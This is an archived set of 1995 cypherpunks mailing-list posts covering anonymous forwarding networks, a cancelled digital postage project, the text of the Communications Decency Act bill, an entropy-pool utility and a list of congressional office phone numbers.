Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arsen Ray Arachelian <rarachel@photon.poly.edu>
Date: Tue, 7 Feb 95 19:24:07 PST
To: cypherpunks@toad.com
Subject: !NYC Cypherpunks meeting 2/11/95!
Message-ID: <Pine.3.89.9502072204.B12080-0100000@photon.poly.edu>
MIME-Version: 1.0
Content-Type: text/plain



Incase you're in the NYC area, there is a meeting this Saturday.  (If 
you're already on the list of NYC Cypherpunks, you'd have received the 
notice with the address.)  If you're in NYC, but not on the NYC 
Cypherpunks list, and you need info, please send email to me, 
rarachel@photon.poly.edu, and I'll give you directions.

See you there..
--Ray.

===============================================================================
| + ^ + || ' . . .   .   . .   .             Ray  (Arsen)  Arachelian        ||
|  \|/  ||   . . .  ' . ' .  : . .           rarachel@photon.poly.edu        ||
|<--+-->||.   . . |' '| .' .  .  ...    ___  sunder@intercom.com             ||
|  /|\  ||   .  . \___/ .  . . : .... __[R]                                  ||
| + v + || . oOOo /o.O\ oOOo :. : ..    |A| "And bugs to kill before I sleep"||
=========/---vvvv-------VVVV------------|I|----------------------------------/
        /      .    :   . ' : '         |D|     This signature pannel is    /
       /  The Next Bug to kill(tm)      ---     now open.                  / 
      /___________________________________________________________________/
GCS d++(---)(-) H s+++/++ !g !p !au a- w-(+) (!v | v)  C+++++ Coherent++++ 
L+ 3 C+ V+ P? E- N++ K- W W--- M++ V-- po- Y+++ t:[tos+, tng--, ds9+] 5 !j
!R G? tv+ b+++ D+ B--- e+(- | *) u--- h+++ f+(++) r++ n+(---) x**(++)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@aeinet.com>
Date: Tue, 7 Feb 95 22:53:33 PST
To: eric@remailer.net>
Subject: RE: a new way to do anonymity
Message-ID: <Chameleon.4.01.950207225342.jcorgan@comet.aeinet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>   There are many, many analogies you can draw about a network of this
>   type to an ATM (asynchronous transfer mode) network.  
>
>Thank you for the analogy.  It's always good not to reinvent the wheel
>when you don't need to.

Exactly.  Anywhere we can "stand on the shoulders" of others reduces wasted
time and effort.

>When you set up a mapping on a packet forwarder, this is exactly the
>kind of initialization that would be required.  It is also at this
>point that keying would be negotiated, etc.

Encrypt-Telnet to a switch process.  Use text based command line sequence
to check outbound paths, bandwidth available, negotiate quality of service,
execute digital payment arrangements, etc.  Conclude the transaction and
get bumped to your next hop, where it happens all over again.

Done right, it could probably be automated.  It seems like a lot of effort,
but if you remember that once an initial session is established with your
Pipe-net Service Provider (tm), a given circuit can be relatively long-lived.

>Now here's an important detail that needs to get done right.  Is the
>forwarding for fixed length packets, variable length packets, or
>streams?  Is this decision global or local?  What are the latency and
>aggregatation effects?  How important are these for different classes
>of data?  (telnet v. voice, e.g.)

One of the lessons learned in the years-long debate between the telco folks
pushing synchronous time-division multiplexing point to point circuit switches 
and the data folks pushing variable length packet-switched broadcast medium
networks is that fixed length packets can give you both TDM and statistical
multiplexing.  So, at the bottom most session layer, moving bits around in
fixed chunks allows you to do things easier like bandwidth pre-allocation,
aggregation, circuit based congestion control, and negotiated quality of
service agreements to end points in the network.

To learn from the efforts that have come from the thousands of people working
on ATM, we could take a look at what has emerged as the "ATM Adaptation Layer."

AAL specifies methods to encapsulate various data formats and quality of service
requirements onto this fixed length, continuous stream of data packets.  There
is one for voice traffic, which requires fixed bandwitdth and very little relative
latency, another for LAN type data packets, which have bursty bandwidth requirements 
and variable packet sizes.  Your comment above is accurate in that the
requirements involved in a Telnet session are vastly different from say, PGP
Phone over TCP.

The good part about all this is that a lot of the thinking, testing, prototyping,
and standardization has already been done.  The standards exist today for adapting
variable bandwidth, variable packet length, variable latency data packets onto
a continous stream of fixed length packets moving through a switched network.

This reminds me of the old days of Packet Radio which used intelligent repeaters
that you would access (via command line), determine your next repeater, then
log into it, etc.  I once established virtual circuit from Connecticut to Florida
over 2 meter packet that took 25 or so hops, and had a transit delay of a half
an hour.  Primitive, kludgy, unreliable, and essentially useless, but totally cool.

An opportunity presents itself here to establish this Pipe-net style service
network, that would greatly expand the ability for network users to essentially
bypass all the crap which appears to be coming down on us from our friendly 
representatives in Washington, who are trying so hard to "protect" us from 
ourselves. 

>I'd suggest just getting something running first, to get some
>prototyping experience.

Of course.  What I've outline is a pretty ambitious goal.  I'd be happy to see
primitive switch implementations that do nothing more than forward TCP streams.
Its a start and we would learn a lot along the way.  Alas, I don't do Unix; my
programming expertise is in (gasp) the Windows environment.  So it looks like
I could start looking at the requirements implementation of a Winsock interface
that made all this stuff transparent to an end user.  Important consideration.

I suppose the IRC folks could add their experience to the mix.  In a very real
way, IRC _is_ a packet switched unicast/multicast stream service on top of the
'net.  Do we have any IRC op types onboard here?

==
Johnathan Corgan       "Violence is the last refuge of the incompetent."
jcorgan@aeinet.com                    -Isaac Asimov
WWW:                     ftp://ftp.netcom.com/pub/jc/jcorgan/home.html


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzhqMU1Diok8GKihAQGRxAP/dWIvYMuqX5c1y/Mlmc73WQlQ/1263vqb
YzGMvgTFEP0p/jZZstb8tMOyHY2KKp7WWLXV94jd8/KhdQgYFtGHphVm93WP3Bu8
hRK8kV5UEtANQ/JycVHG6HU3MMxLhE+Yh+M/CFLBwBZZYYglnV3DLqBHv4kq+5Tg
/7ZiTjnHRDk=
=ee6L
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daleh@ix.netcom.com (Dale Harrison (AEGIS))
Date: Tue, 7 Feb 95 22:35:37 PST
To: cypherpunks@toad.com
Subject: USPO & Digital Postage/E-Cash Project
Message-ID: <199502080625.WAA20933@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


The US Post Office just killed a project that would have created a 
digital postage/e-cash system.  This would have been a digital 
replacement for the Pitney-Bose style Postage Metering machines.  To use 
a PM machine one has to take the entire machine physically to a Postal 
Station and purchase some fixed dollar amount of postage.  The Postal 
clerk unseals and unlocks the machine, dials in the amount of postage 
purchased and then relocks and reseals the machine.  

This mechanical system would have been replaced by a serial-port dongle 
and a piece of software.  The dongle would contain an EEPROM in a 
replacable button (made by Dallas Semiconductor) into which would be 
loaded data indicating the amount of postage that had been purchased and 
not yet used.  The software package would be able to print the address, 
postage seal, routing codes, etc directly on the envelope via a laser 
printer and decrement the amount of available postage left in the 
dongle.  In the original test, customers would have to take the dongle 
to a Postal Station to purchase additional postage, but the ultimate 
goal was to have been to have a commerical dial-up service available 
that one could dial into and purchase additional postage directly. 

A proof-of-concept prototype was developed in VB and a production 
prototype was then developed in VC++.  Unfortunately the crypto wasn't 
very strong.  The USPO contracted with Carnege-Mellon to try and break 
the system and they were able to within a couple of weeks.  USPO then 
killed the project.


Dale H.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuel Kaplin <skaplin@mirage.skypoint.com>
Date: Tue, 7 Feb 95 20:48:24 PST
To: Brad Huntting <huntting@glarp.com>
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <199502080445.VAA00395@misc.glarp.com>
Message-ID: <Pine.SV4.3.91.950207224618.23122A-100000@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 7 Feb 1995, Brad Huntting wrote:

> 
> Can anyone confirm this S.314 thing?  It sounds an awful lot like
> the "modem tax" and other urban legends.
> 
> 
> brad
> 

Web over to: http://thomas.loc.gov

It's on the Senates web server. The bill is for real. I wish it was only 
a hoax.

Sam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuel Kaplin <skaplin@mirage.skypoint.com>
Date: Tue, 7 Feb 95 21:12:51 PST
To: Brad Huntting <huntting@glarp.com>
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <199502080445.VAA00395@misc.glarp.com>
Message-ID: <Pine.SV4.3.91.950207230934.23719A-100000@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 7 Feb 1995, Brad Huntting wrote:

> 
> Can anyone confirm this S.314 thing?  It sounds an awful lot like
> the "modem tax" and other urban legends.

Here is everything T.H.O.M.A.S. had on it. (http://thomas.loc.gov)

 S 314 IS
 104th CONGRESS
1st Session
To protect the public from the misuse of the telecommunications
network and telecommunications devices and facilities.
 IN THE SENATE OF THE UNITED STATES
February 1 (legislative day, January 30), 1995
 
          Mr. Exon (for himself and Mr. Gorton) introduced the following
bill; which was read twice and referred to the Committee on
Commerce, Science, and Transportation A BILL
 
          To protect the public from the misuse of the telecommunications
network and telecommunications devices and facilities.
       Be it enacted by the Senate and House of Representatives of the
United States of America in Congress assembled,
 SECTION 1. SHORT TITLE.
This Act may be cited as the `Communications Decency Act of 1995'.
 
          SEC. 2. OBSCENE OR HARASSING USE OF TELECOMMUNICATIONS FACILITIES
UNDER THE COMMUNICATIONS ACT OF 1934.
 (a) Offenses: Section 223 of the Communications Act of 1934 (47
 
U.S.C. 223) is amended--
 (1) in subsection (a)(1)--
 (A) by striking out `telephone' in the matter above
        subparagraph (A) and inserting `telecommunications device';
 (B) by striking out `makes any comment, request,
        suggestion, or proposal' in subparagraph (A) and inserting
        `makes, transmits, or otherwise makes available any
comment, request, suggestion, proposal, image, or other
communication';
 (C) by striking out subparagraph (B) and inserting the
    following:
      `(B) makes a telephone call or utilizes a
telecommunications device, whether or not conversation or
        communications ensues, without disclosing his identity and
        with intent to annoy, abuse, threaten, or harass any person
      at the called number or who receives the communication;' and
 (D) by striking out subparagraph (D) and inserting the
        following:     
        `(D) makes repeated telephone calls or repeatedly
        initiates communication with a telecommunications device,
during which conversation or communication ensues, solely
      to harass any person at the called number or who receives
3
        the communication; or';
22), by striking `telephone facility'
and inserting `telecommunications facility'; 
(3) in subsection (b)(1)--
A) in subparagraph (A)--
      (i) by striking `telephone' and inserting
    `telecommunications device'; and
      (ii) inserting `or initiated the communication' and
    `placed the call', and
B) in subparagraph (B), by striking `telephone facility'
and inserting `telecommunications facility'; and
(4) in subsection (b)(2)-- 
  (A) in subparagraph (A)--
      (i) by striking `by means of telephone, makes' and  
    inserting `by means of telephone or telecommunications 
    device, makes, knowingly transmits, or knowingly makes  
  available'; and
      (ii) by inserting `or initiated the communication'
  after `placed the call'; and
  (B) in subparagraph (B), by striking `telephone facility'
and inserting in lieu thereof `telecommunications facility'.
(b) Penalties: Section 223 of such Act (47 U.S.C. 223) is amended--
4
(1) by striking out `$50,000' each place it appears and
inserting `$100,000'; and
  (2) by striking `six months' each place it appears and
inserting `2 years'.
(c) Prohibition on Provision of Access: Subsection (c)(1) of such
section (47 U.S.C. 223(c)) is amended by striking `telephone' and
inserting `telecommunications device.'
(d) Conforming Amendment: The section heading for such section is
amended to read as follows:
`obscene or harassing utilization of telecommunications devices and
facilities in the district of columbia or in interstate or foreign
communications'.
SEC. 3. OBSCENE PROGRAMMING ON CABLE TELEVISION.
Section 639 of the Communications Act of 1934 (47 U.S.C. 559) is
amended by striking `$10,000' and inserting `$100,000'.
SEC. 4. BROADCASTING OBSCENE LANGUAGE ON RADIO. 
Section 1464 of title 18, United States Code, is amended by
striking out `$10,000' and inserting `$100,000'.
SEC. 5. INTERCEPTION AND DISCLOSURE OF ELECTRONIC COMMUNICATIONS.
Section 2511 of title 18, United States Code, is amended--
(1) in paragraph (1)--
        (A) by striking `wire, oral, or electronic communication'  
5
  each place it appears and inserting `wire, oral,     
    electronic, or digital communication', and
    (B) in the matter designated as `(b)', by striking `oral
    communication' in the matter above clause (i) and inserting
      `communication'; and
      (2) in paragraph (2)(a), by striking `wire or electronic   
    communication service' each place it appears (other than in the
  second sentence) and inserting `wire, electronic, or digital   
    communication service'.
SEC. 6. ADDITIONAL PROHIBITION ON BILLING FOR TOLL-FREE TELEPHONE  
 CALLS.
  Section 228(c)(6) of the Communications Act of 1934 (47 U.S.C.
228(c)(6)) is amended--
    (1) by striking `or' at the end of subparagraph (C); 
      (2) by striking the period at the end of subparagraph (D) and
    inserting a semicolon and `or'; and
    (3) by adding at the end thereof the following:
 `(E) the calling party being assessed, by virtue of being
        asked to connect or otherwise transfer to a pay-per-call 
      service, a charge for the call.'. 
SEC. 7. SCRAMBLING OF CABLE CHANNELS FOR NONSUBSCRIBERS.
Part IV of title VI of the Communications Act of 1934 (47 U.S.C. 
6
551 et seq.) is amended by adding at the end the following:
`SEC. 640. SCRAMBLING OF CABLE CHANNELS FOR NONSUBSCRIBERS.
`(a) Requirement: In providing video programming unsuitable for 
children to any subscriber through a cable system, a cable operator
shall fully scramble or otherwise fully block the video and audio
portion of each channel carrying such programming so that one not a
subscriber does not receive it. 
`(b) Definition: As used in this section, the term `scramble' 
means to rearrange the content of the signal of the programming so
that the programming cannot be received by persons unauthorized to
receive the programming.'.
SEC. 8. CABLE OPERATOR REFUSAL TO CARRY CERTAIN PROGRAMS. 
  (a) Public, Educational, and Governmental Channels: Section
611(e) of the Communications Act of 1934 (47 U.S.C. 531(e)) is
amended by inserting before the period the following: `, except a  
cable operator may refuse to transmit any public access program or
portion of a public access program which contains obscenity,
indecency, or nudity'.
(b) Cable Channels for Commercial Use: Section 612(c)(2) of the
Communications Act of 1934 (47 U.S.C. 532(c)(2)) is amended by
striking `an operator' and inserting `a cable operator may refuse
to transmit any leased access program or portion of a leased access
7
program which contains obscenity, indecency, or nudity.    
 
  
 
 
 
 
  
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Pugh <0003701548@mcimail.com>
Date: Tue, 7 Feb 95 20:59:06 PST
To: "cypherpunks@toad.com>
Subject: Fwd: Seals and Sealing Waxes
Message-ID: <10950208045401/0003701548PJ3EM@MCIMAIL.COM>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Date: Tue Feb 07, 1995  10:15 PM EST
To: cypherpunks@toad.com
Subject: Fwd: Seals and Sealing Waxes
Message-Id:                                         

TM> "All crypto is economics," and this is what made seals and sealing wax so
TM> useful for so long. Saying "seals were duplicatable from the start" does
TM> not mean this feat was easy, even if technically possible.

TM> In fact, the fine details produced by a good seal are hard to exactly
TM> emulate with a copy. Even on a two-dimensional surface. And with the
advent
TM> of three-dimensional surfaces, which sealing wax made possible, the fine
TM> detail of a good seal was in fact very hard to forge.

TM> Not impossible, but very costly with the technology of the day. Or even
the
TM> technology of _today_. After all, paper currency is largely based on seal
TM> technology, with various embossing, printing, etc. methods used (on
special
TM> paper) that remain fairly hard to duplicate.
    
true. thanks for the reminder of seals. i need to work this analogy into my
current 'lecture' on the usefullness of encryption.

_puzzle palace_ makes reference to british intellegence making use of people
trained into the use of people trained to reproduce seals. this is something 
for us to look out for from the fine folx at nsa. if there is a way to spoof
signatures (as mentioned in another thread recently), they will be perfecting
and perhaps using these methods if they feel the need is great enough.

i promote encryption using pgp with a lot of stress on the privacy and
veracity of documents in business settings. 

how strong is the hash used by pgp? do you think it will eventually be
hashed out in the courts in our favour?(pun semi-intended)
                                  
i'd like digital signatures w/verifiable timestamps be recognised in a
court of law. i don't know of any cases revolving around this issue.
if anyone out there knows of one, i'd be interested in hearing of it
so i can track it's progress.

btw: though it is a pain sometimes to weed the noise off this list due
to my (very) limited net access, it has proved to be an excellent
resource. my thanks to the regulars. 

- --if i could code worth a damn i'd be a cypherpunk

amp
<0003701548@mcimail.com>
February 7, 1995   22:17

-----BEGIN PGP SIGNATURE-----
Version: 2.61

iQEVAwUBLzgN4CgP1O9KJoPBAQETZQf/WAY0I+fvEmevc7iwfVglqjIZ26zDnc33
p8Yjc+uQfagS0wavYLpN+OxMphpdUHHjycb98aYLDax8CUW3iDJ54tZKVnQT3pPx
9+v1gq38UbP8k7hvoGl5lIltmMJ/rMl2lZU87l2biYjmQq8n9S+mMoIOAatcmboG
6JQ4MEsNnZvsQVeaZm87qOGqfkeTbzwsBfz8LjLkgnv7TLUNn5wJgMgiC+apYC0V
bJfAHWce3UGEPlaa4JHBbCRyfrC/hk1ggrYKthxHKE+Ceep1O2k7fRkX/tCC2BZC
UaY8ZjogZKZJbfdDNmlG7fBN5EBWlj6Mj9Ti2SRYlx4q8lwSHad+gg==
=HeNj
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: strick@techwood.org
Date: Wed, 8 Feb 95 00:11:19 PST
To: Matt Blaze <mab@research.att.com>
Subject: noiz ... and more SKRONK
Message-ID: <199502080810.AAA08113@nando.yak.net>
MIME-Version: 1.0
Content-Type: text/plain


MAB:
> Also, /etc/noiz is an attractive target
> on multi-user machines....

Right.   But you notice I made it mode 660, owner root, group kmem, to
parallel the /dev/*mem devices.   You have the same vulnerabilities as
always on a multi-user system, even if you put /dev/noise in the kernel
or run a TCP daemon.  Another parallel is the randseed.bin file in
PGP.

From an information theory point of view, I don't know how to describe
the kind of shared-entropy that this pool exhibits.  Making the source
of the entropy hidden to the users by crunching on the way out with MD5
adds something to the data -- it's not true entropy, but it's some kind
of effective entropy, from the point of view of the users.  Unless MD5
has weaknesses that I assume it doesn't, it's not really possible for users
to know where their spaces of possible random values overlap, so they
don't know how to exploit it.

A final note -- I should have put /etc/noiz somewhere in the 
/var filesystem.  Perhaps /var/adm/noiz.
But one can edit the Makefile to do that, and no other software
has to actually know where it is, since its access is totally
encapsulated by noizinit, noizstir, and noizout.  The location of
these in /usr/local/bin/ is what needs to be standardized, so I
hope that's good enough for most users.

-------

Oh, I meant to thank everyone for the great discussion and 
constructive criticism of SKRONK and "encrypt tcp connections" hacks.
Especially Perry -- your enumeration of projects was good.

Based on that, and what I know of the others, the priority of 
protocols I'd like to support with skronk are
	0.  my own hack, to get it going
	1.  Matt's ESM
	2.  Kerberized connections (kerb4 or kerb5 or both?)
	3.  Perhaps the SSL from Netscape

Thus SKRONK becomes what I wanted it to be:  a way for sites to
advertize the availability of enhanced services (via the skronk map UDP
daemon) and a way to painlessly integrate crypto with existing code.
(The last aspect always draws user interface problems -- if it's so
transparent, how do you know if you're encrypted?  Right now I have the
client end scribble to stderr when it skronks.)

			strick





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuel Kaplin <skaplin@c2.org>
Date: Wed, 8 Feb 95 00:41:10 PST
To: cypherpunks@toad.com
Subject: Congressional Phone Numbers
Message-ID: <Pine.SUN.3.91.950208003250.25382A-100000@infinity>
MIME-Version: 1.0
Content-Type: text/plain


In view of recent legislation, I'm going to repost this...No flames please.

NRA.org List of members of 104th Congress

ALASKA
Member                             Phone          Fax Number

Sen. Murkowski, Frank H. (R)       1-202-224-6665 1-202-224-5301
Sen. Stevens, Ted (R)              1-202-224-3004 1-202-224-1044

Young, Donald (R-AL)               1-202-225-5765 1-202-225-5765


ALABAMA
Member                             Phone          Fax Number

Sen. Heflin, Howell T. (D)         1-202-224-4124 1-202-224-3149
Sen. Shelby, Richard C. (R)        1-202-224-5744 1-202-224-3416

Callahan, Sonny (R-01)             1-202-225-4931 1-202-225-0562
Everett, Terry (R-02)              1-202-225-2901
Browder, Glen (D-03)               1-202-225-3261 1-202-225-9020
Bevill, Thomas (D-04)              1-202-225-4876 1-202-225-0842
Cramer, Robert E. (D-05)           1-202-225-4801 1-202-225-4392
Bachus, Spencer (R-06)             1-202-225-4921 1-202-225-2082
Hilliard, Earl F. (D-07)           1-202-225-2665 1-202-226-0772


ARKANSAS
Member                             Phone          Fax Number

Sen. Bumpers, Dale (D)             1-202-224-4843 1-202-224-6435
Sen. Pryor, David (D)              1-202-224-2353 1-202-224-8261

Lambert, Blanche (D-01)            1-202-225-4076 1-202-225-4654
Thornton, Raymond (D-02)           1-202-225-2506 1-202-225-9273
Hutchinson, Tim (R-03)             1-202-225-4301 1-202-226-1163
Dickey, Jay (R-04)                 1-202-225-3772 1-202-225-8646


ARIZONA
Member                             Phone          Fax Number

Sen. Kyl, Jon (R)                  1-202-224-4521 1-202-224-2302
Sen. McCain, John (R)              1-202-224-2235 1-202-228-2862

Salmon, Matt (R-01)                1-202-225-2635 1-202-225-2607
Pastor, Ed (D-02)                  1-202-225-4065 1-202-225-1655
Stump, Robert (R-03)               1-202-225-4576 1-202-225-6328
Shadegg, John (R-04)               1-202-225-3361 1-202-225-1143
Kolbe, James T. (R-05)             1-202-225-2542 1-202-225-0378
Hayworth, J.D. (R-06)              1-202-225-2190 1-202-225-8819


CALIFORNIA
Member                             Phone          Fax Number

Sen. Boxer, Barbara (D)            1-202-225-5161
Sen. Feinstein, Dianne (D)         1-202-224-3841 1-202-228-3954

Riggs, Frank (R-01)                1-202-225-3311 1-202-225-7710
Herger, Walter W. (R-02)           1-202-225-3076 1-202-225-1609
Fazio, Vic (D-03)                  1-202-225-5716 1-202-225-0354
Doolittle, John T. (R-04)          1-202-225-2511 1-202-225-5444
Matsui, Robert T. (D-05)           1-202-225-7163 1-202-225-0566
Woolsey, Lynn (D-06)               1-202-225-5161 1-202-225-5163
Miller, George (D-07)              1-202-225-2095 1-202-225-5609
Pelosi, Nancy (D-08)               1-202-225-4965 1-202-225-8259
Dellums, Ronald V. (D-09)          1-202-225-2661 1-202-225-9817
Baker, Bill (R-10)                 1-202-225-1880 1-202-225-2150
Pombo, Richard (R-11)              1-202-225-1947 1-202-226-0861
Lantos, Thomas (D-12)              1-202-225-3531 1-202-225-3127
Stark, Fortney H. (D-13)           1-202-225-5065
Eshoo, Anna G. (D-14)              1-202-225-8104 1-202-225-8890
Mineta, Norman Y. (D-15)           1-202-225-2631
Lofgren, Zoe (D-16)                1-202-225-3072 1-202-225-9460
Farr, Sam (D-17)
Condit, Gary (D-18)                1-202-225-6131 1-202-225-0819
Radanovich, George (R-19)          1-202-225-4540 1-202-225-5274
Dooley, Calvin M. (D-20)           1-202-225-3341 1-202-225-9308
Thomas, Bill (R-21)                1-202-225-2915 1-202-225-8798
Seastrand, Andrea (R-22)           1-202-225-3601 1-202-226-1015
Gallegly, Elton (R-23)             1-202-225-5811 1-202-225-1100
Beilenson, Anthony (D-24)          1-202-225-5911
McKeon, Howard P. (R-25)           1-202-225-1956 1-202-226-0683
Berman, Howard L. (D-26)           1-202-225-4695 1-202-225-5279
Moorhead, Carlos J. (R-27)         1-202-225-4176 1-202-226-1279
Dreier, David (R-28)               1-202-225-2305 1-202-225-4745
Waxman, Henry A. (D-29)            1-202-225-3976 1-202-225-4099
Becerra, Xavier (D-30)             1-202-225-6235 1-202-225-2202
Martinez, Matthew G. (D-31)        1-202-225-5464 1-202-225-4467
Dixon, Julian C. (D-32)            1-202-225-7084 1-202-225-4091
Roybal-Allard, Lucille (D-33)      1-202-225-1766 1-202-226-0350
Torres, Esteban E. (D-34)          1-202-225-5256 1-202-225-9711
Waters, Maxine (D-35)              1-202-225-2201 1-202-225-7584
Harman, Jane (D-36)                1-202-225-8220 1-202-226-0684
Tucker III, Walter R. (D-37)       1-202-225-7924 1-202-225-7926
Horn, Steve (R-38)                 1-202-225-6676 1-202-226-1012
Royce, Ed (R-39)                   1-202-225-4111 1-202-226-0335
Lewis, Jerry (R-40)                1-202-225-5861 1-202-225-6498
Kim, Jay C. (R-41)                 1-202-225-3201 1-202-226-1485
Brown Jr., George E. (D-42)        1-202-225-6161 1-202-225-8671
Calvert, Kenneth (R-43)            1-202-225-1986
Bono, Sonny (R-44)                 1-202-225-5330 1-202-226-1040
Rohrabacher, Dana (R-45)           1-202-225-2415 1-202-225-7067
Dornan, Robert K. (R-46)           1-202-225-2965 1-202-225-3694
Cox, Christopher (R-47)            1-202-225-5611 1-202-225-9177
Packard, Ronald (R-48)             1-202-225-3906 1-202-225-0134
Bilbray, Brian (R-49)              1-202-225-2040 1-202-225-2042
Filner, Bob (D-50)                 1-202-225-8045 1-202-225-9073
Cunningham, Randy (R-51)           1-202-225-5452 1-202-225-2558
Hunter, Duncan L. (R-52)           1-202-225-5672 1-202-225-0235


COLORADO
Member                             Phone          Fax Number

Sen. Campbell, Ben N. (D)          1-202-225-4761 1-202-225-0228
Sen. Brown, Henry (R)              1-202-224-5941 1-202-224-6471

Schroeder, Patricia (D-01)         1-202-225-4431 1-202-225-5842
Skaggs, David E. (D-02)            1-202-225-2161 1-202-225-9127
McInnis, Scott (R-03)              1-202-225-4761 1-202-226-0622
Allard, Wayne (R-04)               1-202-225-4676 1-202-225-8630
Hefley, Joel (R-05)                1-202-225-4422 1-202-225-1942
Schaefer, Daniel (R-06)            1-202-225-7882 1-202-225-7885


CONNECTICUT
Member                             Phone          Fax Number

Sen. Dodd, Christopher J. (D-CT)   1-202-224-2823
Sen. Lieberman, Joseph I. (D-CT)   1-202-224-4041 1-202-224-9750

Kennelly, Barbara B. (D-01)        1-202-225-2265 1-202-225-1031
Gejdenson, Samuel (D-02)           1-202-225-2076 1-202-225-4977
DeLauro, Rosa (D-03)               1-202-225-3661 1-202-225-4890
Shays, Christopher (R-04)          1-202-225-5541 1-202-225-9629
Franks, Gary (R-05)                1-202-225-3822 1-202-225-5085
Johnson, Nancy L. (R-06)           1-202-225-4476 1-202-225-4488


WASHINGTON, D.C.
Member                             Phone          Fax Number

Del. Norton, Eleanor Holmes (D-AL) 1-202-225-8050 1-202-225-3002


DELAWARE
Member                             Phone          Fax Number

Sen. Biden Jr., Joseph R. (D)      1-202-224-5042 1-202-224-0139
Sen. Roth Jr., William V. (R)      1-202-224-2441 1-202-224-2805

Castle, Michael N. (R-AL)          1-202-225-4165 1-202-225-2291


FLORIDA
Member                             Phone          Fax Number

Sen. Graham, Bob (D)               1-202-224-3041 1-202-224-2237
Sen. Mack, Connie (R)              1-202-224-5274 1-202-224-8022

Scarborough, Joe (R-01)            1-202-225-4136 1-202-225-5785
Peterson, Peter (D-02)             1-202-225-5235 1-202-225-1586
Brown, Corrine (D-03)              1-202-225-0123 1-202-225-2256
Fowler, Tillie (R-04)              1-202-225-2501 1-202-225-9318
Thurman, Karen (R-05)              1-202-225-1002 1-202-226-0329
Stearns, Clifford B. (R-06)        1-202-225-5744 1-202-225-3973
Mica, John L. (R-07)               1-202-225-4035 1-202-226-0821
McCollum, William (R-08)           1-202-225-2176 1-202-225-0999
Bilirakis, Michael (R-09)          1-202-225-5755 1-202-225-4085
Young, C. W. Bill (R-10)           1-202-225-5961 1-202-225-9764
Gibbons, Samuel M. (D-11)          1-202-225-3376
Canady, Charles T. (R-12)          1-202-225-1252 1-202-225-2279
Miller, Dan (R-13)                 1-202-225-5015 1-202-226-0828
Goss, Porter J. (R-14)             1-202-225-2536 1-202-225-6820
Weldon, Dave (R-15)                1-202-225-3671 1-202-225-9039
Foley, Mark (R-16)                 1-202-225-5792 1-202-225-1860
Meek, Carrie (D-17)                1-202-225-4506 1-202-226-0777
Ros-Lehtinen, Ileana (R-18)        1-202-225-3931 1-202-225-5620
Johnston II, Harry (D-19)          1-202-225-3001 1-202-225-8791
Deutsch, Peter (D-20)              1-202-225-7931 1-202-225-8456
Diaz-Balart, Lincoln (R-21)        1-202-225-4211 1-202-225-8576
Shaw Jr., E. Clay (R-22)           1-202-225-3026 1-202-225-8398
Hastings, Alcee L. (D-23)          1-202-225-1313 1-202-225-0690


GEORGIA
Member                             Phone          Fax Number

Sen. Coverdell, Paul (R)           1-202-224-3643 1-202-228-3783
Sen. Nunn, Samuel (D)              1-202-224-3521 1-202-224-0072

Kingston, Jack (R-01)              1-202-225-5831 1-202-226-2269
Bishop, Sanford (D-02)             1-202-225-3631 1-202-225-2203
Collins, Michael (Mac)             (R-03)    1-202-225-5901
1-202-225-2515
Linder, John (R-04)                1-202-225-4272 1-202-225-4696
Lewis, John (D-05)                 1-202-225-3801 1-202-225-0351
Gingrich, Newt (R-06)              1-202-225-4501 1-202-225-4656
Barr, Bob (R-07)                   1-202-225-2931 1-202-225-0473
Chambliss, Saxby (R-08)            1-202-225-6531 1-202-225-7719
Deal, Nathan (D-09)                1-202-225-5211 1-202-225-8272
Norwood, Charles (D-10)            1-202-225-4101 1-202-226-1466
McKinney, Cynthia (D-11)           1-202-225-1605 1-202-226-0691


GUAM
Member                             Phone          Fax Number

Del. Underwood, Robert A. (D-AL)   1-202-225-1188 1-202-226-0341


HAWAII
Member                             Phone          Fax Number

Sen. Akaka, Daniel K. (D)          1-202-224-6361 1-202-224-2126
Sen. Inouye, Daniel K. (D)         1-202-224-3934 1-202-224-6747

Abercrombie, Neil (D-01)           1-202-225-2726 1-202-225-4580
Mink, Patsy T. (D-02)              1-202-225-4906 1-202-225-4987


IOWA
Member                             Phone          Fax Number

Sen. Grassley, Charles E. (R)      1-202-224-3744 1-202-224-6020
Sen. Harkin, Thomas (D)            1-202-224-3254 1-202-224-7431

Leach, James (R-01)                1-202-225-6576 1-202-226-1278
Nussle, James Allen (R-02)         1-202-225-2911 1-202-225-9129
Lightfoot, James R. (R-03)         1-202-225-3806 1-202-225-6973
Ganske, Greg (R-04)                1-202-225-4426
Latham, Tom (R-05)                 1-202-225-5476 1-202-225-6929


IDAHO
Member                             Phone          Fax Number

Sen. Kempthorne, Dirk (R)          1-202-224-6142 1-202-224-5893
Sen. Craig, Larry E. (R)           1-202-224-2752 1-202-224-2573

Chenoweth, Helen (R-01)            1-202-225-6611 1-202-226-1213
Crapo, Michael D. (R-02)           1-202-225-5531 1-202-225-8216


ILLINOIS
Member                             Phone          Fax Number

